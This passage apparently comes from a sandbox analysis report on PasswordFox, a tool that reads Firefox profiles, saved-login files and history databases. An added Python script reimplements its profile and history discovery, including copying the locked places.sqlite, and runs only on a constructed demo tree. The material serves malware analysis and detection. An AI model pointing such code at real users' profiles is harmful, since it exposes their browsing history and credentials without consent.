                                        • wcslen.MSVCRT ref: 00403FC2
                                        • wcslen.MSVCRT ref: 00403FD0
                                        • wcslen.MSVCRT ref: 00404001
                                        • wcslen.MSVCRT ref: 0040400F
                                        • wcslen.MSVCRT ref: 00404040
                                        • wcslen.MSVCRT ref: 0040404E
                                        • SetCurrentDirectoryW.KERNEL32(?), ref: 0040414E
                                          • Part of subcall function 00403A29: memset.MSVCRT ref: 00403A68
                                          • Part of subcall function 00403A29: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,?,00000104,00000000,00000000), ref: 00403A81
                                          • Part of subcall function 00403A29: memset.MSVCRT ref: 00403AF2
                                          • Part of subcall function 00403A29: memset.MSVCRT ref: 00403B07
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.1743739038.0000000000401000.00000040.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 0000000B.00000002.1743720176.0000000000400000.00000002.00000001.01000000.0000000E.sdmp
                                        • Associated: 0000000B.00000002.1743739038.000000000040F000.00000040.00000001.01000000.0000000E.sdmp
                                        • Associated: 0000000B.00000002.1743739038.0000000000411000.00000040.00000001.01000000.0000000E.sdmp
                                        • Associated: 0000000B.00000002.1743799089.0000000000416000.00000080.00000001.01000000.0000000E.sdmp
                                        • Associated: 0000000B.00000002.1743819346.0000000000417000.00000004.00000001.01000000.0000000E.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_400000_PasswordFox.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: memsetwcslen$AddressProc$CurrentDirectory$ByteCharLibraryLoadMultiWide$HandleModule
                                        • String ID: signons.sqlite$signons.txt$signons2.txt$signons3.txt
                                        • API String ID: 909768024-2435954524
                                        • Opcode ID: 2cd41763164bfc268848fe1a4c35ae9e78612bbf97f8d55e22d6e3cbca22dac0
                                        • Instruction ID: c203f00cef873be9fb78cde1de6421f2abdb522e40cfef1996789d219aa531ea
                                        • Opcode Fuzzy Hash: 2cd41763164bfc268848fe1a4c35ae9e78612bbf97f8d55e22d6e3cbca22dac0
                                        • Instruction Fuzzy Hash: D47173B2408345ABC720EF51DC8199B77EDEF84315F10093EFA88F61D1E7399A548B5A

                                        Control-flow Graph

                                        APIs
                                        • memset.MSVCRT ref: 0040355F
                                          • Part of subcall function 0040A9BF: RegOpenKeyExW.KERNELBASE(80000002,80000002,00000000,00020019,80000002,0040358D,80000002,SOFTWARE\Mozilla,?), ref: 0040A9D2
                                        • _wcsnicmp.MSVCRT ref: 004035D2
                                        • memset.MSVCRT ref: 004035F6
                                        • memset.MSVCRT ref: 00403612
                                        • _snwprintf.MSVCRT ref: 00403632
                                        • wcsrchr.MSVCRT ref: 00403651
                                        • CompareFileTime.KERNEL32(?,?), ref: 00403685
                                        • wcscpy.MSVCRT ref: 004036A7
                                        • memset.MSVCRT ref: 004035AC
                                          • Part of subcall function 0040AA59: RegEnumKeyExW.ADVAPI32(00000000,?,?,?,00000000,00000000,00000000,?,?,00000000), ref: 0040AA7C
                                        • RegCloseKey.ADVAPI32(?), ref: 004036DF
                                        • wcscpy.MSVCRT ref: 004036ED
                                        • ExpandEnvironmentStringsW.KERNEL32(%programfiles%\Mozilla Firefox,?,00000104), ref: 00403704
                                        • GetCurrentDirectoryW.KERNEL32(00000104,?,?,00000104), ref: 00403740
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.1743739038.0000000000401000.00000040.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 0000000B.00000002.1743720176.0000000000400000.00000002.00000001.01000000.0000000E.sdmp
                                        • Associated: 0000000B.00000002.1743739038.000000000040F000.00000040.00000001.01000000.0000000E.sdmp
                                        • Associated: 0000000B.00000002.1743739038.0000000000411000.00000040.00000001.01000000.0000000E.sdmp
                                        • Associated: 0000000B.00000002.1743799089.0000000000416000.00000080.00000001.01000000.0000000E.sdmp
                                        • Associated: 0000000B.00000002.1743819346.0000000000417000.00000004.00000001.01000000.0000000E.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_400000_PasswordFox.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: memset$wcscpy$CloseCompareCurrentDirectoryEnumEnvironmentExpandFileOpenStringsTime_snwprintf_wcsnicmpwcsrchr
                                        • String ID: %programfiles%\Mozilla Firefox$%s\bin$SOFTWARE\Mozilla$mozilla
                                        • API String ID: 1094916163-3304446826
                                        • Opcode ID: d87aefb1ff376ea55b32d79d498fb8176b26e42b29f7c254c3bd9a02580b83b6
                                        • Instruction ID: e48ef5db9bdb8b4a7d99f75cc5e27f3a554516f7c19b45dad1929bcfdf1d344f
                                        • Opcode Fuzzy Hash: d87aefb1ff376ea55b32d79d498fb8176b26e42b29f7c254c3bd9a02580b83b6
                                        • Instruction Fuzzy Hash: 195143B2900219AADB60EFA1DC85ADF7BBCAF04314F0005B6F904B6191E7749B84CB99

                                        Control-flow Graph

                                        APIs
                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.1743739038.0000000000401000.00000040.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 0000000B.00000002.1743720176.0000000000400000.00000002.00000001.01000000.0000000E.sdmp
                                        • Associated: 0000000B.00000002.1743739038.000000000040F000.00000040.00000001.01000000.0000000E.sdmp
                                        • Associated: 0000000B.00000002.1743739038.0000000000411000.00000040.00000001.01000000.0000000E.sdmp
                                        • Associated: 0000000B.00000002.1743799089.0000000000416000.00000080.00000001.01000000.0000000E.sdmp
                                        • Associated: 0000000B.00000002.1743819346.0000000000417000.00000004.00000001.01000000.0000000E.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_400000_PasswordFox.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: HandleModule_initterm$InfoStartup__p__commode__p__fmode__set_app_type__setusermatherr__wgetmainargs_cexitexit
                                        • String ID:
                                        • API String ID: 2827331108-0
                                        • Opcode ID: 33ca073d47c7302e7342fcea8aba624dc4a35c459148cc5e94e9aeb5e10264c8
                                        • Instruction ID: e01cd669bdb7fb49093a9b6ff8a530008b0410016245136eb8964f66b7eabaf2
                                        • Opcode Fuzzy Hash: 33ca073d47c7302e7342fcea8aba624dc4a35c459148cc5e94e9aeb5e10264c8
                                        • Instruction Fuzzy Hash: 2A519071C40205EFCB20AFA4D988AAE77B4FB44314F20867BE855B72D1D7794982CB9D

                                        Control-flow Graph

                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.1743739038.0000000000401000.00000040.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 0000000B.00000002.1743720176.0000000000400000.00000002.00000001.01000000.0000000E.sdmp
                                        • Associated: 0000000B.00000002.1743739038.000000000040F000.00000040.00000001.01000000.0000000E.sdmp
                                        • Associated: 0000000B.00000002.1743739038.0000000000411000.00000040.00000001.01000000.0000000E.sdmp
                                        • Associated: 0000000B.00000002.1743799089.0000000000416000.00000080.00000001.01000000.0000000E.sdmp
                                        • Associated: 0000000B.00000002.1743819346.0000000000417000.00000004.00000001.01000000.0000000E.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_400000_PasswordFox.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: FileModuleNamememsetwcscatwcsrchr
                                        • String ID: .cfg$/installfolder$/master$/profile
                                        • API String ID: 776488737-2817415528
                                        • Opcode ID: 1385d99f9d3117933856bbdb45573c7bccc4cd1af43ce7ebd9ff815b7821104c
                                        • Instruction ID: c9699089a678a890fee6dac8cdd7aa88665331595cdb8f284d7a2e663852b7aa
                                        • Opcode Fuzzy Hash: 1385d99f9d3117933856bbdb45573c7bccc4cd1af43ce7ebd9ff815b7821104c
                                        • Instruction Fuzzy Hash: 3341B3725001159BDB10EF51DC85ACA73A9EF44314F1840BABD0CBB2C3DB7DAA948BA9

                                        Control-flow Graph

                                        APIs
                                          • Part of subcall function 00409A7A: memset.MSVCRT ref: 00409A96
                                          • Part of subcall function 00409A7A: memset.MSVCRT ref: 00409AAB
                                          • Part of subcall function 00409A7A: wcscat.MSVCRT ref: 00409AD1
                                          • Part of subcall function 00409A7A: wcscat.MSVCRT ref: 00409AF7
                                        • memset.MSVCRT ref: 0040989F
                                        • wcslen.MSVCRT ref: 004098B6
                                        • wcslen.MSVCRT ref: 004098BE
                                        • wcslen.MSVCRT ref: 00409917
                                        • wcslen.MSVCRT ref: 00409925
                                          • Part of subcall function 0040468E: wcscpy.MSVCRT ref: 00404696
                                          • Part of subcall function 0040468E: wcscat.MSVCRT ref: 004046A5
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.1743739038.0000000000401000.00000040.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 0000000B.00000002.1743720176.0000000000400000.00000002.00000001.01000000.0000000E.sdmp
                                        • Associated: 0000000B.00000002.1743739038.000000000040F000.00000040.00000001.01000000.0000000E.sdmp
                                        • Associated: 0000000B.00000002.1743739038.0000000000411000.00000040.00000001.01000000.0000000E.sdmp
                                        • Associated: 0000000B.00000002.1743799089.0000000000416000.00000080.00000001.01000000.0000000E.sdmp
                                        • Associated: 0000000B.00000002.1743819346.0000000000417000.00000004.00000001.01000000.0000000E.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_400000_PasswordFox.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: wcslen$memsetwcscat$wcscpy
                                        • String ID: history.dat$places.sqlite
                                        • API String ID: 2541527827-467022611
                                        • Opcode ID: 078acf5595006b25e19b26cec781eadeda02e5e83cd21b058ea400ee59bb81ae
                                        • Instruction ID: 26d80f911a766dcbd1c55f55748fd8c9ad000421fe116896cc75fe1ca070082e
                                        • Opcode Fuzzy Hash: 078acf5595006b25e19b26cec781eadeda02e5e83cd21b058ea400ee59bb81ae
                                        • Instruction Fuzzy Hash: ED313871D04219AACF10FBA5DC45ADDB7B8AF44319F20847BE514F21C2EB7C9A49CB58

                                        Control-flow Graph

                                        control_flow_graph 283 40accc-40ace3 call 40ac9d 286 40ace5-40acee call 404659 283->286 287 40acf7-40ad28 memset call 40a9bf 283->287 296 40acf5 286->296 292 40ad2a-40ad5c wcscpy call 40a9d9 RegCloseKey 287->292 293 40ad5d-40ad71 wcscpy 287->293 292->293 295 40ad74-40ad76 293->295 296->295
                                        APIs
                                          • Part of subcall function 0040AC9D: LoadLibraryW.KERNEL32(shell32.dll,0040957E), ref: 0040ACAB
                                          • Part of subcall function 0040AC9D: GetProcAddress.KERNEL32(00000000,SHGetSpecialFolderPathW), ref: 0040ACC0
                                        • memset.MSVCRT ref: 0040AD0B
                                        • wcscpy.MSVCRT ref: 0040AD34
                                        • RegCloseKey.ADVAPI32(?,?,?,?,00000208,?,?,?,?,?,00000000), ref: 0040AD56
                                        • wcscpy.MSVCRT ref: 0040AD65
                                          • Part of subcall function 00404659: GetVersionExW.KERNEL32(0040FA78,00000208,0040ACEA,00000000), ref: 00404673
                                        Strings
                                        • AppData, xrefs: 0040AD2E
                                        • Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders, xrefs: 0040AD14
                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.1743739038.0000000000401000.00000040.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000B.00000002.1743720176.0000000000400000.00000002.00000001.01000000.0000000E.sdmp
• Associated: 0000000B.00000002.1743739038.000000000040F000.00000040.00000001.01000000.0000000E.sdmp
• Associated: 0000000B.00000002.1743739038.0000000000411000.00000040.00000001.01000000.0000000E.sdmp
• Associated: 0000000B.00000002.1743799089.0000000000416000.00000080.00000001.01000000.0000000E.sdmp
• Associated: 0000000B.00000002.1743819346.0000000000417000.00000004.00000001.01000000.0000000E.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_400000_PasswordFox.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: wcscpy$AddressCloseLibraryLoadProcVersionmemset
                                        • String ID: AppData$Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
                                        • API String ID: 288233908-3974836871
                                        • Opcode ID: 575bda5dc03a994884795237ba0a5972980a742fe3d38205ca00784e16b8d47f
                                        • Instruction ID: e2d1ccaa5822a8973fc9891ee3d502f62366d36d26647b53b469a464e62ee2b9
                                        • Opcode Fuzzy Hash: 575bda5dc03a994884795237ba0a5972980a742fe3d38205ca00784e16b8d47f
                                        • Instruction Fuzzy Hash: 8C01E1B1941208FADB10B7A49D4ADAE737CDB44304F200077B906B10C2E6795B949AAA

                                        Control-flow Graph

                                        control_flow_graph 298 4092dd-409305 ??2@YAPAXI@Z 299 409323 298->299 300 409307-409321 298->300 301 409325-409338 ??2@YAPAXI@Z 299->301 300->301 302 409341 301->302 303 40933a-40933f call 4024f9 301->303 305 409343-409351 302->305 303->305 307 409360-4093df call 404633 call 401000 GetModuleHandleW LoadIconW call 4017ce call 4097c9 wcsrchr 305->307 308 409353-40935a DeleteObject 305->308 317 4093e1 307->317 318 4093e4-4093eb 307->318 308->307 317->318
                                        APIs
                                        • ??2@YAPAXI@Z.MSVCRT(00000C30,00000000,?,?,?,?,004095D3), ref: 004092FD
                                        • ??2@YAPAXI@Z.MSVCRT(0000050C,00000000,?,?,?,?,004095D3), ref: 00409330
                                        • DeleteObject.GDI32(?), ref: 00409354
                                        • GetModuleHandleW.KERNEL32(00000000,00000000,?,?,?,?,004095D3), ref: 0040939A
                                        • LoadIconW.USER32(00000000,00000065), ref: 004093A3
                                        • wcsrchr.MSVCRT ref: 004093D6
                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.1743739038.0000000000401000.00000040.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000B.00000002.1743720176.0000000000400000.00000002.00000001.01000000.0000000E.sdmp
• Associated: 0000000B.00000002.1743739038.000000000040F000.00000040.00000001.01000000.0000000E.sdmp
• Associated: 0000000B.00000002.1743739038.0000000000411000.00000040.00000001.01000000.0000000E.sdmp
• Associated: 0000000B.00000002.1743799089.0000000000416000.00000080.00000001.01000000.0000000E.sdmp
• Associated: 0000000B.00000002.1743819346.0000000000417000.00000004.00000001.01000000.0000000E.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_400000_PasswordFox.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: ??2@$DeleteHandleIconLoadModuleObjectwcsrchr
                                        • String ID:
                                        • API String ID: 829242273-0
                                        • Opcode ID: b6872d8eefeebd306552a5b8be504b41ed2c6867e2c7576c2d210665d0b67c59
                                        • Instruction ID: a7972903ae27a6600f95bbd13b710df1722676e02896d0f0998b2b2f089c8b71
                                        • Opcode Fuzzy Hash: b6872d8eefeebd306552a5b8be504b41ed2c6867e2c7576c2d210665d0b67c59
                                        • Instruction Fuzzy Hash: 1421BCB1A01704CFC6209F769C89A57B7E8EF44701F550A3FE45AA7292DF7968008F1C

                                        Control-flow Graph

                                        APIs
                                        • memset.MSVCRT ref: 00409A96
                                        • memset.MSVCRT ref: 00409AAB
                                          • Part of subcall function 0040426C: wcslen.MSVCRT ref: 0040426D
                                          • Part of subcall function 0040426C: wcscat.MSVCRT ref: 00404285
                                        • wcscat.MSVCRT ref: 00409AD1
                                          • Part of subcall function 0040ACCC: memset.MSVCRT ref: 0040AD0B
                                          • Part of subcall function 0040ACCC: wcscpy.MSVCRT ref: 0040AD34
                                          • Part of subcall function 0040ACCC: RegCloseKey.ADVAPI32(?,?,?,?,00000208,?,?,?,?,?,00000000), ref: 0040AD56
                                          • Part of subcall function 0040ACCC: wcscpy.MSVCRT ref: 0040AD65
                                        • wcscat.MSVCRT ref: 00409AF7
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.1743739038.0000000000401000.00000040.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000B.00000002.1743720176.0000000000400000.00000002.00000001.01000000.0000000E.sdmp
• Associated: 0000000B.00000002.1743739038.000000000040F000.00000040.00000001.01000000.0000000E.sdmp
• Associated: 0000000B.00000002.1743739038.0000000000411000.00000040.00000001.01000000.0000000E.sdmp
• Associated: 0000000B.00000002.1743799089.0000000000416000.00000080.00000001.01000000.0000000E.sdmp
• Associated: 0000000B.00000002.1743819346.0000000000417000.00000004.00000001.01000000.0000000E.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_400000_PasswordFox.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: memsetwcscat$wcscpy$Closewcslen
                                        • String ID: Mozilla\Firefox\Profiles$Mozilla\Profiles
                                        • API String ID: 3470772675-1174173950
                                        • Opcode ID: ef051dff077b42edc146f8091b62d72c49959b948a275e392804958870f54f5a
                                        • Instruction ID: e450e6f8c22090b410cdc717a0411dff650a31d8cce9db24ae5aa5b386eac940
                                        • Opcode Fuzzy Hash: ef051dff077b42edc146f8091b62d72c49959b948a275e392804958870f54f5a
                                        • Instruction Fuzzy Hash: DA0144B194031C76DB10BB668C85EDB762CDF54758F0145BEB508B7283DA7C8E848AAD
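The function at 409857 (which builds history.dat and places.sqlite paths with wcslen/wcscat and then opens them) and the function at 409a7a (which appends Mozilla\Firefox\Profiles and Mozilla\Profiles to the AppData directory resolved by 40accc) together describe how the sample locates Firefox history stores. The following is an added example written for this page, not the sample's code and not part of the Joe Sandbox report: it reimplements that discovery in Python against a constructed directory tree so it runs offline on any OS. The AppData directory is passed in by the caller (on a real Windows host you would take it from the APPDATA environment variable, where the sample reads the Shell Folders registry key instead); the profile name, URLs and titles are constructed.

```python
from __future__ import annotations

# Added example (not the sample's code): Firefox history-store discovery
# reconstructed from the report's strings and API calls.
import shutil
import sqlite3
import tempfile
from pathlib import Path

# Profile roots the sample appends to AppData (report String IDs for 409a7a).
# The Firefox 3+ location is tried first.
PROFILE_ROOTS = ("Mozilla/Firefox/Profiles", "Mozilla/Profiles")

# History stores probed inside each profile (report String IDs for 409857):
# places.sqlite is the SQLite store used since Firefox 3, history.dat the
# older Mork-format store.
HISTORY_FILES = ("places.sqlite", "history.dat")


def find_profiles(appdata: Path) -> list[Path]:
    """Return every profile directory under the roots the sample probes."""
    profiles = []
    for root in PROFILE_ROOTS:
        base = appdata / root
        if base.is_dir():
            profiles.extend(p for p in sorted(base.iterdir()) if p.is_dir())
    return profiles


def find_history_files(profile: Path) -> list[Path]:
    """Mirror the two path builds in 409857: try each history file name under
    the profile and keep the ones that exist."""
    return [profile / name for name in HISTORY_FILES if (profile / name).is_file()]


def read_places(db_path: Path) -> list[tuple[str, str]]:
    """Read (url, title) rows from places.sqlite.

    Firefox keeps places.sqlite exclusively locked while it runs, so the file
    is copied before it is opened; reading the live file would fail with
    'database is locked'."""
    with tempfile.TemporaryDirectory() as tmp:
        copy = Path(tmp) / "places.sqlite"
        shutil.copyfile(db_path, copy)
        con = sqlite3.connect(copy)
        try:
            return con.execute(
                "SELECT url, IFNULL(title, '') FROM moz_places ORDER BY id"
            ).fetchall()
        finally:
            con.close()


def collect_history(appdata: Path) -> dict[str, list[tuple[str, str]]]:
    """Profile name -> history rows, for every profile that has places.sqlite."""
    result = {}
    for profile in find_profiles(appdata):
        for hist in find_history_files(profile):
            if hist.name == "places.sqlite":
                result[profile.name] = read_places(hist)
    return result


def build_demo_tree(root: Path) -> Path:
    """Construct a fake AppData tree: one modern profile with a minimal
    places.sqlite and one legacy profile directory without any history file.
    All names and rows are constructed, not taken from a real host."""
    appdata = root / "AppData" / "Roaming"
    profile = appdata / "Mozilla" / "Firefox" / "Profiles" / "ab12cd34.default-release"
    profile.mkdir(parents=True)
    con = sqlite3.connect(profile / "places.sqlite")
    con.execute("CREATE TABLE moz_places (id INTEGER PRIMARY KEY, url TEXT, title TEXT)")
    con.executemany(
        "INSERT INTO moz_places (url, title) VALUES (?, ?)",
        [("https://example.test/login", "Sign in"), ("https://example.test/", None)],
    )
    con.commit()
    con.close()
    (appdata / "Mozilla" / "Profiles" / "legacy.default").mkdir(parents=True)
    return appdata


def run_demo() -> dict[str, list[tuple[str, str]]]:
    """Build the constructed tree and run the discovery over it."""
    with tempfile.TemporaryDirectory() as tmp:
        return collect_history(build_demo_tree(Path(tmp)))


if __name__ == "__main__":
    for name, rows in run_demo().items():
        print(name, rows)
```

For detection the useful part is the access pattern rather than the code: a process other than firefox.exe opening AppData\Mozilla\Firefox\Profiles\*\places.sqlite (or copying it to a temporary location first, as above) is the file-access event to alert on.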

                                        Control-flow Graph

                                        APIs
                                        • memset.MSVCRT ref: 0040A914
                                          • Part of subcall function 00404B1B: _snwprintf.MSVCRT ref: 00404B60
                                          • Part of subcall function 00404B1B: memcpy.MSVCRT(?,00000000,00000006,00000000,0000000A,%2.2X ,?), ref: 00404B70
                                        • WritePrivateProfileStringW.KERNEL32(?,?,?,?), ref: 0040A93D
                                        • memset.MSVCRT ref: 0040A947
                                        • GetPrivateProfileStringW.KERNEL32(?,?,0040C3EC,?,00002000,?), ref: 0040A969
                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.1743739038.0000000000401000.00000040.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000B.00000002.1743720176.0000000000400000.00000002.00000001.01000000.0000000E.sdmp
• Associated: 0000000B.00000002.1743739038.000000000040F000.00000040.00000001.01000000.0000000E.sdmp
• Associated: 0000000B.00000002.1743739038.0000000000411000.00000040.00000001.01000000.0000000E.sdmp
• Associated: 0000000B.00000002.1743799089.0000000000416000.00000080.00000001.01000000.0000000E.sdmp
• Associated: 0000000B.00000002.1743819346.0000000000417000.00000004.00000001.01000000.0000000E.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_400000_PasswordFox.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: PrivateProfileStringmemset$Write_snwprintfmemcpy
                                        • String ID:
                                        • API String ID: 1127616056-0
                                        • Opcode ID: 6a0ac252d82ab6e45e5f06d70d27481721c8405b463265ea49a1192a337e88bf
                                        • Instruction ID: 0805f05f1c84009111371c571d81c39805b3661e97e83790b4cfa5a877832717
                                        • Opcode Fuzzy Hash: 6a0ac252d82ab6e45e5f06d70d27481721c8405b463265ea49a1192a337e88bf
                                        • Instruction Fuzzy Hash: E7115AB2500119AEDF116FA4DC42E9A7B69EF44710F10016AFF05B20A1E635AA648BAD

                                        Control-flow Graph

                                        control_flow_graph 355 40abfc-40ac13 FindResourceW 356 40ac15-40ac24 SizeofResource 355->356 357 40ac7a-40ac7f 355->357 358 40ac26-40ac32 LoadResource 356->358 359 40ac79 356->359 358->359 360 40ac34-40ac3d LockResource 358->360 359->357 360->359 361 40ac3f-40ac4d 360->361 362 40ac6b-40ac74 361->362 363 40ac4f 361->363 362->359 364 40ac50-40ac68 363->364 364->364 365 40ac6a 364->365 365->362
                                        APIs
                                        • FindResourceW.KERNELBASE(?,?,?), ref: 0040AC09
                                        • SizeofResource.KERNEL32(?,00000000), ref: 0040AC1A
                                        • LoadResource.KERNEL32(?,00000000), ref: 0040AC2A
                                        • LockResource.KERNEL32(00000000), ref: 0040AC35
                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.1743739038.0000000000401000.00000040.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000B.00000002.1743720176.0000000000400000.00000002.00000001.01000000.0000000E.sdmp
• Associated: 0000000B.00000002.1743739038.000000000040F000.00000040.00000001.01000000.0000000E.sdmp
• Associated: 0000000B.00000002.1743739038.0000000000411000.00000040.00000001.01000000.0000000E.sdmp
• Associated: 0000000B.00000002.1743799089.0000000000416000.00000080.00000001.01000000.0000000E.sdmp
• Associated: 0000000B.00000002.1743819346.0000000000417000.00000004.00000001.01000000.0000000E.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_400000_PasswordFox.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Resource$FindLoadLockSizeof
                                        • String ID:
                                        • API String ID: 3473537107-0
                                        • Opcode ID: 8cb0c87eb665ef4ca7cdfd21abe61c397a1d3518edcc97c4763dfbde86b55a16
                                        • Instruction ID: 2c60b31dc6434aee2e4e2b3c13c974902f5cecfa849892c0ca8faa8051fc444b
                                        • Opcode Fuzzy Hash: 8cb0c87eb665ef4ca7cdfd21abe61c397a1d3518edcc97c4763dfbde86b55a16
                                        • Instruction Fuzzy Hash: 5C01C432700315EBDB155FA5DE89D5F7F5AFB853903098036F809E6261D731C851CAC8

                                        Control-flow Graph

                                        control_flow_graph 366 40b812-40b819 367 40b822-40b829 366->367 368 40b81b-40b821 ??3@YAXPAX@Z 366->368 369 40b832-40b839 367->369 370 40b82b-40b831 ??3@YAXPAX@Z 367->370 368->367 371 40b842-40b849 369->371 372 40b83b-40b841 ??3@YAXPAX@Z 369->372 370->369 373 40b852 371->373 374 40b84b-40b851 ??3@YAXPAX@Z 371->374 372->371 374->373
                                        APIs
                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.1743739038.0000000000401000.00000040.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000B.00000002.1743720176.0000000000400000.00000002.00000001.01000000.0000000E.sdmp
• Associated: 0000000B.00000002.1743739038.000000000040F000.00000040.00000001.01000000.0000000E.sdmp
• Associated: 0000000B.00000002.1743739038.0000000000411000.00000040.00000001.01000000.0000000E.sdmp
• Associated: 0000000B.00000002.1743799089.0000000000416000.00000080.00000001.01000000.0000000E.sdmp
• Associated: 0000000B.00000002.1743819346.0000000000417000.00000004.00000001.01000000.0000000E.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_400000_PasswordFox.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: ??3@
                                        • String ID:
                                        • API String ID: 613200358-0
                                        • Opcode ID: 2f632474f803a20cbab500e3e12bf64a4bbfccd9dcfb8c6282e2b96356ee3b1f
                                        • Instruction ID: db67ca1e18e80713947d2ac5a7d392e0cf7686e501c2c923b77a16c228a3621d
                                        • Opcode Fuzzy Hash: 2f632474f803a20cbab500e3e12bf64a4bbfccd9dcfb8c6282e2b96356ee3b1f
                                        • Instruction Fuzzy Hash: F6E0026270420566DA14BB7AA849A5623DCEA54768394C43EB804F62E2DF7DD98086AC

                                        Control-flow Graph

                                        control_flow_graph 375 4022e3-4022f7 376 4022f9 375->376 377 4022ff-402311 call 403e9b 375->377 376->377 379 402316-402319 377->379 380 402325-40232e 379->380 381 40231b-40231e 379->381 382 402330-402350 call 4053f1 GetParent MessageBoxW 380->382 383 402351-402352 380->383 381->380 384 402320-402323 381->384 382->383 384->380 384->383
                                        APIs
                                        • GetParent.USER32 ref: 00402343
                                        • MessageBoxW.USER32(00000000,?,00000000,PasswordFox), ref: 0040234A
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.1743739038.0000000000401000.00000040.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000B.00000002.1743720176.0000000000400000.00000002.00000001.01000000.0000000E.sdmp
• Associated: 0000000B.00000002.1743739038.000000000040F000.00000040.00000001.01000000.0000000E.sdmp
• Associated: 0000000B.00000002.1743739038.0000000000411000.00000040.00000001.01000000.0000000E.sdmp
• Associated: 0000000B.00000002.1743799089.0000000000416000.00000080.00000001.01000000.0000000E.sdmp
• Associated: 0000000B.00000002.1743819346.0000000000417000.00000004.00000001.01000000.0000000E.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_400000_PasswordFox.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: MessageParent
                                        • String ID: PasswordFox
                                        • API String ID: 4240588283-3917124896
                                        • Opcode ID: 4ffc64a8673cc388c6c70b302c6cca5c2f78c4675569d5824536564ce1fff22d
                                        • Instruction ID: ed9e1bc081cff98ac065e45372b1d485f6bee123588fbeea4320e2687ef7ea35
                                        • Opcode Fuzzy Hash: 4ffc64a8673cc388c6c70b302c6cca5c2f78c4675569d5824536564ce1fff22d
                                        • Instruction Fuzzy Hash: 7BF04472440110EBD7299B64DD8DFD73358EB08301F15057BF945E21E1DBBC9944CB58
                                        APIs
                                        • ??2@YAPAXI@Z.MSVCRT(00000000,004053FF,00402460,PasswordFox), ref: 00405389
                                        • ??2@YAPAXI@Z.MSVCRT(00000000,00000000,004053FF,00402460,PasswordFox), ref: 004053A7
                                        • ??2@YAPAXI@Z.MSVCRT(00000000,00000000,00000000,004053FF,00402460,PasswordFox), ref: 004053C5
                                        • ??2@YAPAXI@Z.MSVCRT(00000000,00000000,00000000,00000000,004053FF,00402460,PasswordFox), ref: 004053E3
                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.1743739038.0000000000401000.00000040.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000B.00000002.1743720176.0000000000400000.00000002.00000001.01000000.0000000E.sdmp
• Associated: 0000000B.00000002.1743739038.000000000040F000.00000040.00000001.01000000.0000000E.sdmp
• Associated: 0000000B.00000002.1743739038.0000000000411000.00000040.00000001.01000000.0000000E.sdmp
• Associated: 0000000B.00000002.1743799089.0000000000416000.00000080.00000001.01000000.0000000E.sdmp
• Associated: 0000000B.00000002.1743819346.0000000000417000.00000004.00000001.01000000.0000000E.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_400000_PasswordFox.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: ??2@
                                        • String ID:
                                        • API String ID: 1033339047-0
                                        • Opcode ID: e0a6fb643f5fe0e917eddc980f966602776b1e2d87de5879e0afff261d85d5fd
